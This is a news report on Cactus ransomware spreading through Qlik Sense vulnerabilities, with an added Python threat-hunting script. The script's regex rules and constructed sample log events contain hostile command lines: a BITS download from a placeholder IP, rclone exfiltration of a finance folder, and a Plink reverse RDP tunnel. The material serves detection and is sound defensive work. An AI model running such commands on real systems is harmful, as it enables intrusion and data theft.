
Cactus ransomware is actively being spread via the cloud analytics and BI platform Qlik Sense, security specialists at Arctic Wolf Labs recently discovered.

According to Arctic Wolf, this is the first time that vulnerabilities in Qlik Sense have been exploited to gain access to systems in order to spread the Cactus ransomware. In this attack, the hackers are exploiting a combination of known vulnerabilities in the cloud analytics and BI platform, specifically CVE-2023-41266, CVE-2023-41265 and possibly CVE-2023-48365. These vulnerabilities are exploited for remote code execution and, in this case, for spreading the Cactus ransomware.

Attack path

Examining what takes place after a successful exploit of Qlik Sense, the security specialists found that the hackers then made use of the Qlik Sense Scheduler service, among other things. They also abused PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tooling, which gave them remote monitoring functionality.

Rolling out Cactus ransomware

In addition, suspicious activities were observed that indicated the rollout and use of the Cactus ransomware. These included using RDP for lateral movement, downloading the WizTree disk analyzer and deploying rclone for data exfiltration.

Other malicious actions included deploying ManageEngine UEMS and AnyDesk for remote access, actively uninstalling Sophos software, changing the admin password and setting up an RDP tunnel via Plink.
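The post-exploitation chain described in the two sections above (scheduler-spawned PowerShell, BITS downloads, rclone, Plink, Sophos removal, remote-access tools) is what a defender would hunt for in process-creation telemetry. The following is an added example, not Arctic Wolf's or Qlik's code: a small rule matcher run over constructed Sysmon-style records. The Qlik scheduler binary path and the Sophos uninstaller path are placeholders chosen for the example, not values from the report.

```python
import re

# (rule name, regex on parent image, regex on image + command line), all lower-cased
RULES = [
    ("qlik-scheduler-spawns-powershell", r"qlik.*scheduler", r"powershell"),
    ("bits-download", r"", r"bitsadmin\s+/transfer|start-bitstransfer"),
    ("rclone-exfil", r"", r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b"),
    ("plink-rdp-tunnel", r"", r"\bplink(\.exe)?\b.*3389"),
    ("sophos-uninstall", r"", r"sophos.*uninstall"),
    ("remote-access-tool", r"", r"\banydesk\b|manageengine"),
]

def match_rules(event):
    """Return the names of every rule one process-creation event triggers."""
    parent = event.get("parent_image", "").lower()
    target = f"{event.get('image', '')} {event.get('command_line', '')}".lower()
    return [name for name, parent_re, target_re in RULES
            if re.search(parent_re, parent) and re.search(target_re, target)]

def hunt(events):
    """Map event id -> triggered rule names; clean events are left out."""
    hits = {}
    for event in events:
        names = match_rules(event)
        if names:
            hits[event["id"]] = names
    return hits

# Constructed Sysmon-style records. The scheduler binary path and the Sophos
# uninstaller path are placeholders for this example, not reported values.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell Start-BitsTransfer -Source http://198.51.100.7/t.zip -Destination C:\Users\Public\t.zip"},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\rclone.exe", "command_line": r"rclone.exe copy C:\Finance remote:share"},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\plink.exe", "command_line": "plink.exe -N -R 53389:127.0.0.1:3389 203.0.113.5"},
    {"id": 5, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Sophos\Endpoint\uninstallcli.exe", "command_line": "uninstallcli.exe"},
    {"id": 6, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\Public\AnyDesk.exe", "command_line": "AnyDesk.exe"},
]

if __name__ == "__main__":
    for event_id, names in hunt(SAMPLE_EVENTS).items():
        print(event_id, names)
```

Event 1 trips two rules at once (scheduler-spawned PowerShell plus a BITS download), which is the kind of correlation worth alerting on even when each tool is legitimate on its own.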

Arctic Wolf is still investigating an incident at one of its customers and indicated that more details will follow later.
